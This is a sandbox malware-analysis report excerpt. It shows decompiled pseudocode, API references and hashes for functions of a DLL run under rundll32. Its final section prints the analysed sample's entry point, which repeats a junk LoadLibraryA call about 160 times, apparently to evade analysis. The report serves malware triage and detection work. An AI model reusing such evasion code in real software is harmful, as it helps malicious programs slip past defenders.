0x00728264
0x00728270
0x00728275
0x00728276
0x0072827b
0x0072827e
0x00728287
0x0072828a
0x0072828d
0x00728290
0x00728297
0x007282a2
0x007282ae
0x007282b8
0x007282c5
0x007282c5
0x007282c8
0x007282cb
0x007282cb
0x007282cb
0x00728297
0x007282d9
0x00728318
0x007282db
0x007282e0
0x007282f1
0x00728304
0x00728304
0x0072831d
0x00728320
0x00728323
0x00728330
0x00728330
0x0072822a
0x0072823d
0x00728252
0x00728252
0x00728380
0x00728382
0x00728385
0x00728395
0x00728395

APIs

CharNextW.USER32 ref: 00728390

Strings

|Qq, xrefs: 00728266

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CharNext
String ID: |Qq
API String ID: 3213498283-638084505
Opcode ID: dca54308d67374028eafc23ca0b9c2035d568ba5b82e1412accc6ad0c94739ec
Instruction ID: 4875f8a86d9a9e84711257b0d8d14eac1f09e80fb2c2681220916cb093dac586
Opcode Fuzzy Hash: dca54308d67374028eafc23ca0b9c2035d568ba5b82e1412accc6ad0c94739ec
Instruction Fuzzy Hash: 87513634A00214CFCB48EF68D99895EB7F1FF89700B2585A4E8059B366CB39ED46DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0070F220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0070F220(signed short* __eax, void* __ecx, intOrPtr* __edx) {
				intOrPtr* _v16;
				void* _t15;
				signed short* _t23;
				signed short _t34;
				intOrPtr* _t35;
				void* _t36;

				_t12 = __eax;
				_push(__ecx);
				_t35 = __edx;
				_t23 = __eax;
				if(( *__eax & 0x0000bfe8) != 0) {
					_t12 = E0070EF28(__eax, __ecx);
				}
				_t34 =  *_t35;
				if(_t34 >= 0x14) {
					if(_t34 != 0x100) {
						if(_t34 != 0x101) {
							if((_t34 & 0x00002000) == 0) {
								if(L007139DC(_t34, _t36) == 0) {
									_push(_t35);
									_push(_t23);
									L0070D9A8();
									_t15 = E0070EBF4(_t14);
								} else {
									_t15 =  *((intOrPtr*)( *_v16 + 0x28))(0);
								}
							} else {
								_t15 = E0070F04C(_t23, 0x70f218, _t35);
							}
						} else {
							 *_t23 = _t34;
							_t23[4] =  *(_t35 + 8);
							_t15 =  *0x76f820();
						}
					} else {
						 *_t23 = 0x100;
						_t23[4] = 0;
						_t15 = E007040BC( &(_t23[4]),  *(_t35 + 8));
					}
				} else {
					_push(_t35);
					_push(_t23);
					L0070D9A8();
					_t15 = E0070EBF4(_t12);
				}
				return _t15;
			}

0x0070f220
0x0070f223
0x0070f224
0x0070f226
0x0070f22d
0x0070f231
0x0070f231
0x0070f236
0x0070f23d
0x0070f252
0x0070f270
0x0070f28a
0x0070f2a7
0x0070f2ba
0x0070f2bb
0x0070f2bc
0x0070f2c1
0x0070f2a9
0x0070f2b5
0x0070f2b5
0x0070f28c
0x0070f295
0x0070f295
0x0070f272
0x0070f272
0x0070f278
0x0070f27d
0x0070f27d
0x0070f254
0x0070f254
0x0070f25b
0x0070f264
0x0070f264
0x0070f23f
0x0070f23f
0x0070f240
0x0070f241
0x0070f246
0x0070f246
0x0070f2ca

APIs

VariantCopy.OLEAUT32(?), ref: 0070F241

Part of subcall function 0070EF28: VariantClear.OLEAUT32(?), ref: 0070EF37

Strings

\p, xrefs: 0070F27D

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Variant$ClearCopy
String ID: \p
API String ID: 274517740-2058460253
Opcode ID: b5a2a4af5268cf2e312386f542849161c264fd2f9b59fd79b6661d984630edc9
Instruction ID: 2b9f7241e55d4c6457493aa19cfe56747548422a18580c5f76302f58eeb18932
Opcode Fuzzy Hash: b5a2a4af5268cf2e312386f542849161c264fd2f9b59fd79b6661d984630edc9
Instruction Fuzzy Hash: EB11A074700210C7D730AF68C8C9A5E37D5BF897107108676F44A8B6C6DA3CDC01C292

Uniqueness

Uniqueness Score: -1.00%

Function 00720840 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00720840(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t19;
				char _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t51;

				_t40 = __edx;
				_t39 = __ecx;
				if(__edx != 0) {
					_t51 = _t51 + 0xfffffff0;
					_t19 = E00703598(_t19, _t50);
				}
				_t38 = _t40;
				_t46 = _t19;
				E00703244(0);
				_t1 = _t46 + 0x38; // 0x38
				L007064A0();
				_t47 = L0071FD50(1);
				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
				 *((intOrPtr*)(_t47 + 8)) = E00720FC4;
				_t5 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
				_t48 = E0072027C(1);
				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
				 *((intOrPtr*)(_t48 + 8)) = 0x720fe4;
				_t10 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
				_t49 = E00720548(1);
				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
				 *((intOrPtr*)(_t49 + 8)) = 0x721004;
				_t15 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
				_t32 =  *0x720900; // 0x0
				 *((char*)(_t46 + 8)) = _t32;
				_t33 =  *0x76f8ec; // 0x23f0b08
				E00717360(_t33, _t38, _t39, _t46, _t49);
				_t35 = _t46;
				if(_t38 != 0) {
					E007035F0(_t35);
					_pop( *[fs:0x0]);
				}
				return _t46;
			}

0x00720840
0x00720840
0x00720845
0x00720847
0x0072084a
0x0072084a
0x0072084f
0x00720851
0x00720857
0x0072085c
0x00720860
0x00720871
0x00720873
0x00720876
0x00720879
0x00720880
0x00720883
0x00720892
0x00720894
0x00720897
0x0072089a
0x007208a1
0x007208a4
0x007208b3
0x007208b5
0x007208b8
0x007208bb
0x007208c2
0x007208c5
0x007208c8
0x007208cf
0x007208d4
0x007208d9
0x007208de
0x007208e3
0x007208e7
0x007208e9
0x007208ee
0x007208f5
0x007208fd

APIs

RtlInitializeCriticalSection.KERNEL32(00723C4C,00723C14,?,00000001,00723DAA,?,?,?,00725015,?,?,00724E34,?,0000000E,00000000,?), ref: 00720860

Strings

|q, xrefs: 007208A9
|q, xrefs: 00720888

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: |q$|q
API String ID: 32694325-1594819443
Opcode ID: ae53ac0f4a24c7267bcf46e246d3fb07441774404d13afdf3476d7aede329673
Instruction ID: fa96d12bc7639ce1338dccbf57feb2e4dbd35d75fdea403169b780c281ff6a86
Opcode Fuzzy Hash: ae53ac0f4a24c7267bcf46e246d3fb07441774404d13afdf3476d7aede329673
Instruction Fuzzy Hash: 6B118C71600A11CFC320DF2EE885986FBE9BF44710304862AE459C7B62D379E9588BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00727208 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00727208(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x76f91f != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x76f900; // 0x727208
					 *0x76f900 = E00726F70(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x76f900(_a4, _a8, _t19);
				}
				return _t16;
			}

0x0072720e
0x00727218
0x00727242
0x0072724b
0x00727273
0x00727273
0x0072724d
0x0072724d
0x00727252
0x00000000
0x00000000
0x00727252
0x0072721a
0x0072721f
0x0072722c
0x0072723e
0x0072723e
0x0072727e

APIs

GetSystemMetrics.USER32 ref: 00727256
GetSystemMetrics.USER32 ref: 00727268

Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0

Strings

MonitorFromPoint, xrefs: 0072721A

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: 44435b07de230a87270f8d0dc80292d7a29e1d28411e8ec4dcc17111473ac4a1
Instruction ID: 4d96363815d55fb77b7a4ba790e8c6e3bdbe60fe01ca5f3906a0473bd7698113
Opcode Fuzzy Hash: 44435b07de230a87270f8d0dc80292d7a29e1d28411e8ec4dcc17111473ac4a1
Instruction Fuzzy Hash: D9018F31209329EFDB044F50FE49B6A7BB5FB50394F048225F905CB121C3B8AC40C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0070EF28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0070EF28(intOrPtr* __eax, void* __ecx) {
				void* _t8;
				signed short _t19;
				intOrPtr* _t20;

				_t13 = __eax;
				_t19 =  *__eax;
				if(_t19 >= 0x14) {
					if(_t19 != 0x100) {
						if(_t19 != 0x101) {
							if((_t19 & 0x00002000) == 0) {
								if(L007139DC(_t19, _t20) == 0) {
									L0070D9A0();
									_t8 = E0070EBF4(_t7);
								} else {
									_t8 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))();
								}
							} else {
								_t8 = E0070EDAC(__eax);
							}
						} else {
							_t8 =  *0x76f818();
						}
					} else {
						 *((short*)(__eax)) = 0;
						_t8 = E00704068(__eax + 8);
					}
				} else {
					_push(__eax);
					L0070D9A0();
					_t8 = E0070EBF4(__eax);
				}
				return _t8;
			}

0x0070ef2b
0x0070ef2d
0x0070ef34
0x0070ef48
0x0070ef5e
0x0070ef6f
0x0070ef85
0x0070ef94
0x0070ef99
0x0070ef87
0x0070ef8e
0x0070ef8e
0x0070ef71
0x0070ef73
0x0070ef73
0x0070ef60
0x0070ef62
0x0070ef62
0x0070ef4a
0x0070ef4a
0x0070ef52
0x0070ef52
0x0070ef36
0x0070ef36
0x0070ef37
0x0070ef3c
0x0070ef3c
0x0070efa1

APIs

VariantClear.OLEAUT32(?), ref: 0070EF37

Strings

\p, xrefs: 0070EF62

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: ClearVariant
String ID: \p
API String ID: 1473721057-2058460253
Opcode ID: e06c2019275d83567ccc3780cf4e800c4192998745a3de2da1d022aa1899ac1a
Instruction ID: f18b2b55c3653c79f9384257561712e3f7f6b918306e478d349e13c91bb69a95
Opcode Fuzzy Hash: e06c2019275d83567ccc3780cf4e800c4192998745a3de2da1d022aa1899ac1a
Instruction Fuzzy Hash: BEF06261708212CBCB64BB7899896A927D59F40710B604F75F08A9B2D6CB6CFD45C363

Uniqueness

Uniqueness Score: -1.00%

Function 00727058 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00727058(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x76f91c == 0) {
					 *0x76f8f4 = E00726F70(0, _t8,  *0x76f8f4, _t17, _t18);
					return GetSystemMetrics(_t8);
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

0x0072705c
0x00727066
0x0072707a
0x00000000
0x00727080
0x00727088
0x00727090
0x00727090
0x00727093
0x007270a7
0x00727095
0x00727095
0x007270ab
0x00727097
0x00727097
0x00727097
0x00727098
0x007270af
0x0072709a
0x0072709b
0x0072709e
0x007270a0
0x007270a0
0x0072709e
0x00727098
0x00727095
0x007270b4
0x007270b7
0x007270c1
0x007270b9
0x00000000
0x007270ba

APIs

GetSystemMetrics.USER32 ref: 007270BA

Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0

GetSystemMetrics.USER32 ref: 00727080

Strings

GetSystemMetrics, xrefs: 00727068

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: 1de9f561cd35e2c2eb5166f8de6081447a125f275aed1873d9cef05de6575b42
Instruction ID: 0d6844468eb0688809911320c5ae846b399357fe962e392e7af7a3ec92e11cf2
Opcode Fuzzy Hash: 1de9f561cd35e2c2eb5166f8de6081447a125f275aed1873d9cef05de6575b42
Instruction Fuzzy Hash: 68F0CD3011C2228ECB395A34BF84B263595A7A2330F64AA31F212862E6C57D9A0CC266

Uniqueness

Uniqueness Score: -1.00%

Function 00716168 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00716168(void* __edx) {
				void* _t5;
				void* _t15;
				void* _t20;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t28;

				_t20 = __edx;
				if(__edx != 0) {
					_t28 = _t28 + 0xfffffff0;
					_t5 = E00703598(_t5, _t27);
				}
				_t25 = _t5;
				E00703244(0);
				 *((intOrPtr*)(_t25 + 4)) = E00703244(1);
				_t2 = _t25 + 8; // 0x8
				L007064A0();
				_t26 = L00715E38(1);
				_t3 = _t25 + 4; // 0x6f724767
				E00716F20( *_t3, _t26);
				 *((char*)(_t26 + 0x10)) = 1;
				_t15 = _t25;
				if(_t20 != 0) {
					E007035F0(_t15);
					_pop( *[fs:0x0]);
				}
				return _t25;
			}

0x00716168
0x0071616d
0x0071616f
0x00716172
0x00716172
0x00716179
0x0071617f
0x00716190
0x00716193
0x00716197
0x007161ae
0x007161b0
0x007161b5
0x007161ba
0x007161be
0x007161c2
0x007161c4
0x007161c9
0x007161d0
0x007161d8

APIs

RtlInitializeCriticalSection.KERNEL32(00715D58,?,?,?,0071DF84,00000000,0071DFB9), ref: 00716197

Strings

pNq, xrefs: 0071619C
`Mq, xrefs: 00716186

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: `Mq$pNq
API String ID: 32694325-1408708686
Opcode ID: 867a7c8712a2f2d87e26529ca43c16c3357d3b65ff8e69652681cb39e7715dde
Instruction ID: d7ebf9980785f7cb37e0aedf5edf774af18c2d4473019eb95dba361821d6a843
Opcode Fuzzy Hash: 867a7c8712a2f2d87e26529ca43c16c3357d3b65ff8e69652681cb39e7715dde
Instruction Fuzzy Hash: 44F06272700541DBC310EB7DDC85A9AB7DAAB85754B088220F4048B3D6DB2E9D5987A5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 3272, Parent PID: 5904COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	760
Total number of Limit Nodes:	22

Executed Functions

Function 00E7B448 Relevance: 310.9, APIs: 172, Strings: 5, Instructions: 1196
librarymemorywindowCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {

				E00E1615C(0xe7b028);
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				if (LoadIconA(0, 0x113c) != 0) goto 0xe7bdf0;
			}

0x00e7b454
0x00e7b45e
0x00e7b468
0x00e7b472
0x00e7b47c
0x00e7b486
0x00e7b490
0x00e7b49a
0x00e7b4a4
0x00e7b4ae
0x00e7b4b8
0x00e7b4c2
0x00e7b4cc
0x00e7b4d6
0x00e7b4e0
0x00e7b4ea
0x00e7b4f4
0x00e7b4fe
0x00e7b508
0x00e7b512
0x00e7b51c
0x00e7b526
0x00e7b530
0x00e7b53a
0x00e7b544
0x00e7b54e
0x00e7b558
0x00e7b562
0x00e7b56c
0x00e7b576
0x00e7b580
0x00e7b58a
0x00e7b594
0x00e7b59e
0x00e7b5a8
0x00e7b5b2
0x00e7b5bc
0x00e7b5c6
0x00e7b5d0
0x00e7b5da
0x00e7b5e4
0x00e7b5ee
0x00e7b5f8
0x00e7b602
0x00e7b60c
0x00e7b616
0x00e7b620
0x00e7b62a
0x00e7b634
0x00e7b63e
0x00e7b648
0x00e7b652
0x00e7b65c
0x00e7b666
0x00e7b670
0x00e7b67a
0x00e7b684
0x00e7b68e
0x00e7b698
0x00e7b6a2
0x00e7b6ac
0x00e7b6b6
0x00e7b6c0
0x00e7b6ca
0x00e7b6d4
0x00e7b6de
0x00e7b6e8
0x00e7b6f2
0x00e7b6fc
0x00e7b706
0x00e7b710
0x00e7b71a
0x00e7b724
0x00e7b72e
0x00e7b738
0x00e7b742
0x00e7b74c
0x00e7b756
0x00e7b760
0x00e7b76a
0x00e7b774
0x00e7b77e
0x00e7b788
0x00e7b792
0x00e7b79c
0x00e7b7a6
0x00e7b7b0
0x00e7b7ba
0x00e7b7c4
0x00e7b7ce
0x00e7b7d8
0x00e7b7e2
0x00e7b7ec
0x00e7b7f6
0x00e7b800
0x00e7b80a
0x00e7b814
0x00e7b81e
0x00e7b828
0x00e7b832
0x00e7b83c
0x00e7b846
0x00e7b850
0x00e7b85a
0x00e7b864
0x00e7b86e
0x00e7b878
0x00e7b882
0x00e7b88c
0x00e7b896
0x00e7b8a0
0x00e7b8aa
0x00e7b8b4
0x00e7b8be
0x00e7b8c8
0x00e7b8d2
0x00e7b8dc
0x00e7b8e6
0x00e7b8f0
0x00e7b8fa
0x00e7b904
0x00e7b90e
0x00e7b918
0x00e7b922
0x00e7b92c
0x00e7b936
0x00e7b940
0x00e7b94a
0x00e7b954
0x00e7b95e
0x00e7b968
0x00e7b972
0x00e7b97c
0x00e7b986
0x00e7b990
0x00e7b99a
0x00e7b9a4
0x00e7b9ae
0x00e7b9b8
0x00e7b9c2
0x00e7b9cc
0x00e7b9d6
0x00e7b9e0
0x00e7b9ea
0x00e7b9f4
0x00e7b9fe
